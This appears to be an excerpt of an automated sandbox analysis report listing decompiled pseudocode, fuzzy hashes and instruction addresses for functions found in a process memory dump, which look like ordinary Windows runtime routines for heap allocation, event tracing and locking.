0x01a00117
0x01a00117
0x00000000
0x01a000f6
0x01a000d0
0x01a000d0
0x00000000

Memory Dump Source

Source File: 00000001.00000002.396482282.00000000019C0000.00000040.00000001.sdmp, Offset: 019C0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 36dd63b94aa52f6540266370a1de76a7b7b1fe149796b2e90e2642fcbfba20e8
Instruction ID: 4016e6636cd34409833f1ee206bf29cf27ca645ba42233f375a332941313bb8d
Opcode Fuzzy Hash: 36dd63b94aa52f6540266370a1de76a7b7b1fe149796b2e90e2642fcbfba20e8
Instruction Fuzzy Hash: 04318D31201B05CFD722CF28DA40B96B7F5FF89764F18856DE59A87A90EB75A801CB90

Uniqueness

Uniqueness Score: -1.00%

Function 01A66C0A, Relevance: .1, Instructions: 79
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E01A66C0A(signed short* __ecx, signed char __edx, signed char _a4, signed char _a8) {
				signed short* _v8;
				signed char _v12;
				void* _t22;
				signed char* _t23;
				intOrPtr _t24;
				signed short* _t44;
				void* _t47;
				signed char* _t56;
				signed char* _t58;

				_t48 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t44 = __ecx;
				_v12 = __edx;
				_v8 = __ecx;
				_t22 = E01A07D50();
				_t58 = 0x7ffe0384;
				if(_t22 == 0) {
					_t23 = 0x7ffe0384;
				} else {
					_t23 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				}
				if( *_t23 != 0) {
					_t24 =  *0x1ad7b9c; // 0x0
					_t47 = ( *_t44 & 0x0000ffff) + 0x30;
					_t23 = L01A04620(_t48,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t24 + 0x180000, _t47);
					_t56 = _t23;
					if(_t56 != 0) {
						_t56[0x24] = _a4;
						_t56[0x28] = _a8;
						_t56[6] = 0x1420;
						_t56[0x20] = _v12;
						_t14 =  &(_t56[0x2c]); // 0x2c
						E01A2F3E0(_t14, _v8[2],  *_v8 & 0x0000ffff);
						_t56[0x2c + (( *_v8 & 0x0000ffff) >> 1) * 2] = 0;
						if(E01A07D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						}
						_push(_t56);
						_push(_t47 - 0x20);
						_push(0x402);
						_push( *_t58 & 0x000000ff);
						E01A29AE0();
						_t23 = L01A077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t56);
					}
				}
				return _t23;
			}

0x01a66c0a
0x01a66c0f
0x01a66c10
0x01a66c13
0x01a66c15
0x01a66c19
0x01a66c1c
0x01a66c21
0x01a66c28
0x01a66c3a
0x01a66c2a
0x01a66c33
0x01a66c33
0x01a66c3f
0x01a66c48
0x01a66c4d
0x01a66c60
0x01a66c65
0x01a66c69
0x01a66c73
0x01a66c79
0x01a66c7f
0x01a66c86
0x01a66c90
0x01a66c94
0x01a66ca6
0x01a66cb2
0x01a66cbd
0x01a66cbd
0x01a66cc3
0x01a66cc7
0x01a66ccb
0x01a66cd0
0x01a66cd1
0x01a66ce2
0x01a66ce2
0x01a66c69
0x01a66ced

Memory Dump Source

Source File: 00000001.00000002.396482282.00000000019C0000.00000040.00000001.sdmp, Offset: 019C0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2aff2cf78c8137d2c147aa5499796c648ad952a5b7df41ff12913dce91add871
Instruction ID: 5b8f2d9db09231a7a6adf7040bbe419e1caae4863161126a0e1475cea618b4eb
Opcode Fuzzy Hash: 2aff2cf78c8137d2c147aa5499796c648ad952a5b7df41ff12913dce91add871
Instruction Fuzzy Hash: EC21AB71A00A55AFD716DFACD980E2AB7B8FF48740F040069F909D7791D634ED10CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 01A290AF, Relevance: .1, Instructions: 76
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E01A290AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
				intOrPtr* _v0;
				void* _v8;
				signed int _v12;
				intOrPtr _v16;
				char _v36;
				void* _t38;
				intOrPtr _t41;
				void* _t44;
				signed int _t45;
				intOrPtr* _t49;
				signed int _t57;
				signed int _t58;
				intOrPtr* _t59;
				void* _t62;
				void* _t63;
				void* _t65;
				void* _t66;
				signed int _t69;
				intOrPtr* _t70;
				void* _t71;
				intOrPtr* _t72;
				intOrPtr* _t73;
				char _t74;

				_t65 = __edx;
				_t57 = _a4;
				_t32 = __ecx;
				_v8 = __edx;
				_t3 = _t32 + 0x14c; // 0x14c
				_t70 = _t3;
				_v16 = __ecx;
				_t72 =  *_t70;
				while(_t72 != _t70) {
					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
						L24:
						_t72 =  *_t72;
						continue;
					}
					_t30 = _t72 + 0x10; // 0x10
					if(E01A3D4F0(_t30, _t65, _t57) == _t57) {
						return 0xb7;
					}
					_t65 = _v8;
					goto L24;
				}
				_t61 = _t57;
				_push( &_v12);
				_t66 = 0x10;
				if(E01A1E5E0(_t57, _t66) < 0) {
					return 0x216;
				}
				_t73 = L01A04620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
				if(_t73 == 0) {
					_t38 = 0xe;
					return _t38;
				}
				_t9 = _t73 + 0x10; // 0x10
				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
				E01A2F3E0(_t9, _v8, _t57);
				_t41 =  *_t70;
				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
					_t62 = 3;
					asm("int 0x29");
					_push(_t62);
					_push(_t57);
					_push(_t73);
					_push(_t70);
					_t71 = _t62;
					_t74 = 0;
					_v36 = 0;
					_t63 = E01A1A2F0(_t62, _t71, 1, 6,  &_v36);
					if(_t63 == 0) {
						L20:
						_t44 = 0x57;
						return _t44;
					}
					_t45 = _v12;
					_t58 = 0x1c;
					if(_t45 < _t58) {
						goto L20;
					}
					_t69 = _t45 / _t58;
					if(_t69 == 0) {
						L19:
						return 0xe8;
					}
					_t59 = _v0;
					do {
						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
							goto L18;
						}
						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
						 *_t59 = _t49;
						if( *_t49 != 0x53445352) {
							goto L18;
						}
						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
						return 0;
						L18:
						_t63 = _t63 + 0x1c;
						_t74 = _t74 + 1;
					} while (_t74 < _t69);
					goto L19;
				}
				 *_t73 = _t41;
				 *((intOrPtr*)(_t73 + 4)) = _t70;
				 *((intOrPtr*)(_t41 + 4)) = _t73;
				 *_t70 = _t73;
				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
				return 0;
			}

0x01a290af
0x01a290b8
0x01a290bb
0x01a290bf
0x01a290c2
0x01a290c2
0x01a290c8
0x01a290cb
0x01a290cd
0x01a614d7
0x01a614eb
0x01a614eb
0x00000000
0x01a614eb
0x01a614db
0x01a614e6
0x00000000
0x01a614f2
0x01a614e8
0x00000000
0x01a614e8
0x01a290d8
0x01a290da
0x01a290dd
0x01a290e5
0x00000000
0x01a29139
0x01a290fa
0x01a290fe
0x01a29142
0x00000000
0x01a29142
0x01a29104
0x01a29107
0x01a2910b
0x01a29110
0x01a29118
0x01a29147
0x01a29148
0x01a2914f
0x01a29150
0x01a29151
0x01a29152
0x01a29156
0x01a2915d
0x01a29160
0x01a29168
0x01a2916c
0x01a291bc
0x01a291be
0x00000000
0x01a291be
0x01a2916e
0x01a29173
0x01a29176
0x00000000
0x00000000
0x01a2917c
0x01a29180
0x01a291b5
0x00000000
0x01a291b5
0x01a29182
0x01a29185
0x01a29189
0x00000000
0x00000000
0x01a2918e
0x01a29190
0x01a29198
0x00000000
0x00000000
0x01a291a0
0x00000000
0x01a291ad
0x01a291ad
0x01a291b0
0x01a291b1
0x00000000
0x01a29185
0x01a2911a
0x01a2911c
0x01a2911f
0x01a29125
0x01a29127
0x00000000

Memory Dump Source

Source File: 00000001.00000002.396482282.00000000019C0000.00000040.00000001.sdmp, Offset: 019C0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
Instruction ID: 2b76188851b4445fc281c909203ffeeeb6485693b24e9f7a40c3ba86788943a1
Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
Instruction Fuzzy Hash: C3214CB1A00325EFDB21DF59C944AAAFBF8EB54754F14886AE949A7251D230A9408B90

Uniqueness

Uniqueness Score: -1.00%

Function 01A13B7A, Relevance: .1, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E01A13B7A(void* __ecx) {
				signed int _v8;
				char _v12;
				intOrPtr _v20;
				intOrPtr _t17;
				intOrPtr _t26;
				void* _t35;
				void* _t38;
				void* _t41;
				intOrPtr _t44;

				_t17 =  *0x1ad84c4; // 0x0
				_v12 = 1;
				_v8 =  *0x1ad84c0 * 0x4c;
				_t41 = __ecx;
				_t35 = L01A04620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t17 + 0x000c0000 | 0x00000008,  *0x1ad84c0 * 0x4c);
				if(_t35 == 0) {
					_t44 = 0xc0000017;
				} else {
					_push( &_v8);
					_push(_v8);
					_push(_t35);
					_push(4);
					_push( &_v12);
					_push(0x6b);
					_t44 = E01A2AA90();
					_v20 = _t44;
					if(_t44 >= 0) {
						E01A2FA60( *((intOrPtr*)(_t41 + 0x20)), 0,  *0x1ad84c0 * 0xc);
						_t38 = _t35;
						if(_t35 < _v8 + _t35) {
							do {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t38 = _t38 +  *((intOrPtr*)(_t38 + 4));
							} while (_t38 < _v8 + _t35);
							_t44 = _v20;
						}
					}
					_t26 =  *0x1ad84c4; // 0x0
					L01A077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t26 + 0xc0000, _t35);
				}
				return _t44;
			}

0x01a13b89
0x01a13b96
0x01a13ba1
0x01a13bab
0x01a13bb5
0x01a13bb9
0x01a56298
0x01a13bbf
0x01a13bc2
0x01a13bc3
0x01a13bc9
0x01a13bca
0x01a13bcc
0x01a13bcd
0x01a13bd4
0x01a13bd6
0x01a13bdb
0x01a13bea
0x01a13bf7
0x01a13bfb
0x01a13bff
0x01a13c09
0x01a13c0a
0x01a13c0b
0x01a13c0f
0x01a13c14
0x01a13c18
0x01a13c18
0x01a13bfb
0x01a13c1b
0x01a13c30
0x01a13c30
0x01a13c3d

Memory Dump Source

Source File: 00000001.00000002.396482282.00000000019C0000.00000040.00000001.sdmp, Offset: 019C0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73b6f203c4edaf0e295011d3115c7ccde8cbe053d5519909e7795b43404817b1
Instruction ID: eea9e353abd56b881d31a582a0f8fad54910fdfd10d24bcd33ad451652fa0ac9
Opcode Fuzzy Hash: 73b6f203c4edaf0e295011d3115c7ccde8cbe053d5519909e7795b43404817b1
Instruction Fuzzy Hash: AB21B0B2A00505EFCB11DF58CE81F6ABBBDFF44758F150068EA09AB252D371AD058B90

Uniqueness

Uniqueness Score: -1.00%

Function 01A66CF0, Relevance: .1, Instructions: 74
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E01A66CF0(void* __edx, intOrPtr _a4, short _a8) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v28;
				char _v36;
				char _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char* _t21;
				void* _t24;
				void* _t36;
				void* _t38;
				void* _t46;

				_push(_t36);
				_t46 = __edx;
				_v12 = 0;
				_v8 = 0;
				_v20 = 0;
				_v16 = 0;
				if(E01A07D50() == 0) {
					_t21 = 0x7ffe0384;
				} else {
					_t21 = ( *[fs:0x30])[0x50] + 0x22a;
				}
				if( *_t21 != 0) {
					_t21 =  *[fs:0x30];
					if((_t21[0x240] & 0x00000004) != 0) {
						if(E01A07D50() == 0) {
							_t21 = 0x7ffe0385;
						} else {
							_t21 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t21 & 0x00000020) != 0) {
							_t56 = _t46;
							if(_t46 == 0) {
								_t46 = 0x19c5c80;
							}
							_push(_t46);
							_push( &_v12);
							_t24 = E01A1F6E0(_t36, 0, _t46, _t56);
							_push(_a4);
							_t38 = _t24;
							_push( &_v28);
							_t21 = E01A1F6E0(_t38, 0, _t46, _t56);
							if(_t38 != 0) {
								if(_t21 != 0) {
									E01A67016(_a8, 0, 0, 0,  &_v36,  &_v28);
									L01A02400( &_v52);
								}
								_t21 = L01A02400( &_v28);
							}
						}
					}
				}
				return _t21;
			}

0x01a66cfb
0x01a66d00
0x01a66d02
0x01a66d06
0x01a66d0a
0x01a66d0e
0x01a66d19
0x01a66d2b
0x01a66d1b
0x01a66d24
0x01a66d24
0x01a66d33
0x01a66d39
0x01a66d46
0x01a66d4f
0x01a66d61
0x01a66d51
0x01a66d5a
0x01a66d5a
0x01a66d69
0x01a66d6b
0x01a66d6d
0x01a66d6f
0x01a66d6f
0x01a66d74
0x01a66d79
0x01a66d7a
0x01a66d7f
0x01a66d82
0x01a66d88
0x01a66d89
0x01a66d90
0x01a66d94
0x01a66da7
0x01a66db1
0x01a66db1
0x01a66dbb
0x01a66dbb
0x01a66d90
0x01a66d69
0x01a66d46
0x01a66dc6

Memory Dump Source

Source File: 00000001.00000002.396482282.00000000019C0000.00000040.00000001.sdmp, Offset: 019C0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ecb79b0d9d9129fff2a4e450f3970cc0d833835c3849841591c9df090c18ff3
Instruction ID: 075932f700da2b6335c3ae418bf87f9edac49cbd9b105d2b0b294fceb66b3a5b
Opcode Fuzzy Hash: 0ecb79b0d9d9129fff2a4e450f3970cc0d833835c3849841591c9df090c18ff3
Instruction Fuzzy Hash: 8921F572500B459FD712DF69CA44BABBBECAFA1780F040556FA44C7291E734D54CC6A2

Uniqueness

Uniqueness Score: -1.00%

Function 01AB070D, Relevance: .1, Instructions: 72
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E01AB070D(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				char _v8;
				intOrPtr _v11;
				signed int _v12;
				intOrPtr _v15;
				signed int _v16;
				intOrPtr _v28;
				void* __ebx;
				char* _t32;
				signed int* _t38;
				signed int _t60;

				_t38 = __ecx;
				_v16 = __edx;
				_t60 = E01AB07DF(__ecx, __edx,  &_a4,  &_a8, 2);
				if(_t60 != 0) {
					_t7 = _t38 + 0x38; // 0x29cd5903
					_push( *_t7);
					_t9 = _t38 + 0x34; // 0x6adeeb00
					_push( *_t9);
					_v12 = _a8 << 0xc;
					_t11 = _t38 + 4; // 0x5de58b5b
					_push(0x4000);
					_v8 = (_a4 << 0xc) + (_v16 - ( *__ecx & _v16) >> 4 <<  *_t11) + ( *__ecx & _v16);
					E01AAAFDE( &_v8,  &_v12);
					E01AB1293(_t38, _v28, _t60);
					if(E01A07D50() == 0) {
						_t32 = 0x7ffe0380;
					} else {
						_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						_t21 = _t38 + 0x3c; // 0xc3595e5f
						E01AA14FB(_t38,  *_t21, _v11, _v15, 0xd);
					}
				}
				return  ~_t60;
			}

0x01ab071b
0x01ab0724
0x01ab0734
0x01ab0738
0x01ab074b
0x01ab074b
0x01ab0753
0x01ab0753
0x01ab0759
0x01ab075d
0x01ab0774
0x01ab0779
0x01ab077d
0x01ab0789
0x01ab0795
0x01ab07a7
0x01ab0797
0x01ab07a0
0x01ab07a0
0x01ab07af
0x01ab07c4
0x01ab07cd
0x01ab07cd
0x01ab07af
0x01ab07dc

Memory Dump Source

Source File: 00000001.00000002.396482282.00000000019C0000.00000040.00000001.sdmp, Offset: 019C0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
Instruction ID: 3c0f1105946c7bbcd614137a064ebdf37e66aa3d1106d2255b8bb4c4e6519cd3
Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
Instruction Fuzzy Hash: 1B213176204640AFD705DF2CC980BABBBB9EFD0350F048629F9948B382DB30D959CB91

Uniqueness

Uniqueness Score: -1.00%

Function 01A67794, Relevance: .1, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E01A67794(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, unsigned int _a8, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _t21;
				void* _t24;
				intOrPtr _t25;
				void* _t36;
				short _t39;
				signed char* _t42;
				unsigned int _t46;
				void* _t50;

				_push(__ecx);
				_push(__ecx);
				_t21 =  *0x1ad7b9c; // 0x0
				_t46 = _a8;
				_v12 = __edx;
				_v8 = __ecx;
				_t4 = _t46 + 0x2e; // 0x2e
				_t36 = _t4;
				_t24 = L01A04620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t21 + 0x180000, _t36);
				_t50 = _t24;
				if(_t50 != 0) {
					_t25 = _a4;
					if(_t25 == 5) {
						L3:
						_t39 = 0x14b1;
					} else {
						_t39 = 0x14b0;
						if(_t25 == 6) {
							goto L3;
						}
					}
					 *((short*)(_t50 + 6)) = _t39;
					 *((intOrPtr*)(_t50 + 0x28)) = _t25;
					_t11 = _t50 + 0x2c; // 0x2c
					 *((intOrPtr*)(_t50 + 0x20)) = _v8;
					 *((intOrPtr*)(_t50 + 0x24)) = _v12;
					E01A2F3E0(_t11, _a12, _t46);
					 *((short*)(_t50 + 0x2c + (_t46 >> 1) * 2)) = 0;
					if(E01A07D50() == 0) {
						_t42 = 0x7ffe0384;
					} else {
						_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t50);
					_t19 = _t36 - 0x20; // 0xe
					_push(0x403);
					_push( *_t42 & 0x000000ff);
					E01A29AE0();
					_t24 = L01A077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t50);
				}
				return _t24;
			}

0x01a67799
0x01a6779a
0x01a6779b
0x01a677a3
0x01a677ab
0x01a677ae
0x01a677b1
0x01a677b1
0x01a677bf
0x01a677c4
0x01a677c8
0x01a677ce
0x01a677d4
0x01a677e0
0x01a677e0
0x01a677d6
0x01a677d6
0x01a677de
0x00000000
0x00000000
0x01a677de
0x01a677e5
0x01a677f0
0x01a677f3
0x01a677f6
0x01a677fd
0x01a67800
0x01a6780c
0x01a67818
0x01a6782b
0x01a6781a
0x01a67823
0x01a67823
0x01a67830
0x01a67831
0x01a67838
0x01a6783d
0x01a6783e
0x01a6784f
0x01a6784f
0x01a6785a

Memory Dump Source

Source File: 00000001.00000002.396482282.00000000019C0000.00000040.00000001.sdmp, Offset: 019C0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae75da885dffc20b930bd0b038b2d47a566a548a055c1fcf3239f26b119a91e7
Instruction ID: 64dcc55f5e33840c2871d0eacf6beb7d3b3d31c578a23cb96593b4fd25334877
Opcode Fuzzy Hash: ae75da885dffc20b930bd0b038b2d47a566a548a055c1fcf3239f26b119a91e7
Instruction Fuzzy Hash: EA216F72910604ABC726DFA9D990E6BBBBDEF48740F104569EA0AD7650D634E900CB94

Uniqueness

Uniqueness Score: -1.00%

Function 01A0AE73, Relevance: .1, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E01A0AE73(intOrPtr __ecx, void* __edx) {
				intOrPtr _v8;
				void* _t19;
				char* _t22;
				signed char* _t24;
				intOrPtr _t25;
				intOrPtr _t27;
				void* _t31;
				intOrPtr _t36;
				char* _t38;
				signed char* _t42;

				_push(__ecx);
				_t31 = __edx;
				_v8 = __ecx;
				_t19 = E01A07D50();
				_t38 = 0x7ffe0384;
				if(_t19 != 0) {
					_t22 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t22 = 0x7ffe0384;
				}
				_t42 = 0x7ffe0385;
				if( *_t22 != 0) {
					if(E01A07D50() == 0) {
						_t24 = 0x7ffe0385;
					} else {
						_t24 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t24 & 0x00000010) != 0) {
						goto L17;
					} else {
						goto L3;
					}
				} else {
					L3:
					_t27 = E01A07D50();
					if(_t27 != 0) {
						_t27 =  *[fs:0x30];
						_t38 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22a;
					}
					if( *_t38 != 0) {
						_t27 =  *[fs:0x30];
						if(( *(_t27 + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						_t27 = E01A07D50();
						if(_t27 != 0) {
							_t27 =  *[fs:0x30];
							_t42 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22b;
						}
						if(( *_t42 & 0x00000020) != 0) {
							L17:
							_t25 = _v8;
							_t36 = 0;
							if(_t25 != 0) {
								_t36 =  *((intOrPtr*)(_t25 + 0x18));
							}
							_t27 = E01A67794( *((intOrPtr*)(_t31 + 0x18)), _t36,  *((intOrPtr*)(_t31 + 0x94)),  *(_t31 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_t31 + 0x28)));
						}
						goto L5;
					} else {
						L5:
						return _t27;
					}
				}
			}

0x01a0ae78
0x01a0ae7c
0x01a0ae7e
0x01a0ae81
0x01a0ae86
0x01a0ae8d
0x01a52691
0x01a0ae93
0x01a0ae93
0x01a0ae93
0x01a0ae98
0x01a0ae9d
0x01a526a2
0x01a526b4
0x01a526a4
0x01a526ad
0x01a526ad
0x01a526b9
0x00000000
0x01a526bb
0x00000000
0x01a526bb
0x01a0aea3
0x01a0aea3
0x01a0aea3
0x01a0aeaa
0x01a526c0
0x01a526c9
0x01a526c9
0x01a0aeb3
0x01a526d4
0x01a526e1
0x00000000
0x00000000
0x01a526e7
0x01a526ee
0x01a526f0
0x01a526f9
0x01a526f9
0x01a52702
0x01a52708
0x01a52708
0x01a5270b
0x01a5270f
0x01a52711
0x01a52711
0x01a52725
0x01a52725
0x00000000
0x01a0aeb9
0x01a0aeb9
0x01a0aebf
0x01a0aebf
0x01a0aeb3

Memory Dump Source

Source File: 00000001.00000002.396482282.00000000019C0000.00000040.00000001.sdmp, Offset: 019C0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
Instruction ID: 720a0032a100c432d0e2da02adf7e08c416f3708690b0b193c46e97c2eb1d4e2
Opcode Fuzzy Hash: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
Instruction Fuzzy Hash: 3021C372605681DFE727DB6DDA44B267BE8EF44750F1900A1DE048BBE2E738DC40CAA0

Uniqueness

Uniqueness Score: -1.00%

Function 01A1FD9B, Relevance: .1, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E01A1FD9B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				intOrPtr _v8;
				void* _t19;
				intOrPtr _t29;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr* _t40;

				_t35 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t37 = 0;
				_v8 = __edx;
				_t29 = __ecx;
				if( *((intOrPtr*)( *[fs:0x18] + 0xfbc)) != 0) {
					_t40 =  *((intOrPtr*)( *[fs:0x18] + 0xfbc));
					L3:
					_t19 = _a4 - 4;
					if(_t19 != 0) {
						if(_t19 != 1) {
							L7:
							return _t37;
						}
						if(_t35 == 0) {
							L11:
							_t37 = 0xc000000d;
							goto L7;
						}
						if( *((intOrPtr*)(_t40 + 4)) != _t37) {
							L01A077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37,  *((intOrPtr*)(_t40 + 4)));
							_t35 = _v8;
						}
						 *((intOrPtr*)(_t40 + 4)) = _t35;
						goto L7;
					}
					if(_t29 == 0) {
						goto L11;
					}
					_t32 =  *_t40;
					if(_t32 != 0) {
						 *((intOrPtr*)(_t29 + 0x20)) =  *((intOrPtr*)(_t32 + 0x20));
						E019F76E2( *_t40);
					}
					 *_t40 = _t29;
					goto L7;
				}
				_t40 = L01A04620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 8);
				if(_t40 == 0) {
					_t37 = 0xc0000017;
					goto L7;
				}
				_t35 = _v8;
				 *_t40 = 0;
				 *((intOrPtr*)(_t40 + 4)) = 0;
				 *((intOrPtr*)( *[fs:0x18] + 0xfbc)) = _t40;
				goto L3;
			}

0x01a1fd9b
0x01a1fda0
0x01a1fda1
0x01a1fdab
0x01a1fdad
0x01a1fdb0
0x01a1fdb8
0x01a1fe0f
0x01a1fde6
0x01a1fde9
0x01a1fdec
0x01a5c0c0
0x01a1fdfe
0x01a1fe06
0x01a1fe06
0x01a5c0c8
0x01a1fe2d
0x01a1fe2d
0x00000000
0x01a1fe2d
0x01a5c0d1
0x01a5c0e0
0x01a5c0e5
0x01a5c0e5
0x01a5c0e8
0x00000000
0x01a5c0e8
0x01a1fdf4
0x00000000
0x00000000
0x01a1fdf6
0x01a1fdfa
0x01a1fe1a
0x01a1fe1f
0x01a1fe1f
0x01a1fdfc
0x00000000
0x01a1fdfc
0x01a1fdcc
0x01a1fdd0
0x01a1fe26
0x00000000
0x01a1fe26
0x01a1fdd8
0x01a1fddb
0x01a1fddd
0x01a1fde0
0x00000000

Memory Dump Source

Source File: 00000001.00000002.396482282.00000000019C0000.00000040.00000001.sdmp, Offset: 019C0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
Instruction ID: f92ff44c36a42ced578b38fea9e045216db4ea4695515c4e5bda1a2096a78b1d
Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
Instruction Fuzzy Hash: 6F21A9B2600A80DFD731CF4DC640A66F7F9EB94B10F24806EE9498B619D730AC09CB80

Uniqueness

Uniqueness Score: -1.00%

Function 019F841F, Relevance: .1, Instructions: 64
COMMONCrypto

Download Yara Rule

C-Code - Quality: 80%

			E019F841F(signed int __ecx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _t43;
				signed int _t46;
				signed int _t50;
				signed int _t57;
				signed int _t64;

				_v16 = __ecx;
				_t43 =  *0x7ffe0004;
				_v8 = _t43;
				_t57 =  *0x7ffe0014 ^  *( *[fs:0x18] + 0x24) ^  *( *[fs:0x18] + 0x20) ^  *0x7ffe0018;
				_v12 = 0x7ffe0014;
				if(_t43 < 0x1000000) {
					while(1) {
						_t46 =  *0x7ffe0324;
						_t50 =  *0x7FFE0320;
						if(_t46 ==  *0x7FFE0328) {
							break;
						}
						asm("pause");
					}
					_t57 = _v12;
					_t64 = ((_t50 * _v8 >> 0x00000020 << 0x00000020 | _t50 * _v8) >> 0x18) + (_t46 << 8) * _v8;
				} else {
					_t64 = ( *0x7ffe0320 * _t43 >> 0x00000020 << 0x00000020 | 0x7ffe0320 * _t43) >> 0x18;
				}
				_push(0);
				_push( &_v24);
				E01A29810();
				return _t64 ^ _v20 ^ _v24 ^ _t57 ^ _v16;
			}

0x019f842f
0x019f8448
0x019f844e
0x019f8459
0x019f845b
0x019f8464
0x01a49ac3
0x01a49ac3
0x01a49ac5
0x01a49acb
0x00000000
0x00000000
0x01a49acd
0x01a49acd
0x01a49ad1
0x01a49ae9
0x019f846a
0x019f8475
0x019f8479
0x019f847c
0x019f8481
0x019f8482
0x019f849a

Memory Dump Source

Source File: 00000001.00000002.396482282.00000000019C0000.00000040.00000001.sdmp, Offset: 019C0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 63ac1e4b842af79e23be26fd2b4bf9cab7c83af8bb38cd4daac8e95d5517faf3
Instruction ID: 7297c65a6d3548bfbd74e8a919b4847234b993df4116cccd7d7119bac9337696
Opcode Fuzzy Hash: 63ac1e4b842af79e23be26fd2b4bf9cab7c83af8bb38cd4daac8e95d5517faf3
Instruction Fuzzy Hash: 79217276E00119DBCB14CFA9C580A9AF7F5FB8C350FA64565EA59B7344C630AE05CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 01A1B390, Relevance: .1, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E01A1B390(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				signed char _t12;
				signed int _t16;
				signed int _t21;
				void* _t28;
				signed int _t30;
				signed int _t36;
				signed int _t41;

				_push(__ecx);
				_t41 = _a4 + 0xffffffb8;
				E01A02280(_t12, 0x1ad8608);
				 *(_t41 + 0x34) =  *(_t41 + 0x34) - 1;
				asm("sbb edi, edi");
				_t36 =  !( ~( *(_t41 + 0x34))) & _t41;
				_v8 = _t36;
				asm("lock cmpxchg [ebx], ecx");
				_t30 = 1;
				if(1 != 1) {
					while(1) {
						_t21 = _t30 & 0x00000006;
						_t16 = _t30;
						_t28 = (0 | _t21 == 0x00000002) * 4 - 1 + _t30;
						asm("lock cmpxchg [edi], esi");
						if(_t16 == _t30) {
							break;
						}
						_t30 = _t16;
					}
					_t36 = _v8;
					if(_t21 == 2) {
						_t16 = E01A200C2(0x1ad8608, 0, _t28);
					}
				}
				if(_t36 != 0) {
					_t16 = L01A077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t36);
				}
				return _t16;
			}

0x01a1b395
0x01a1b3a2
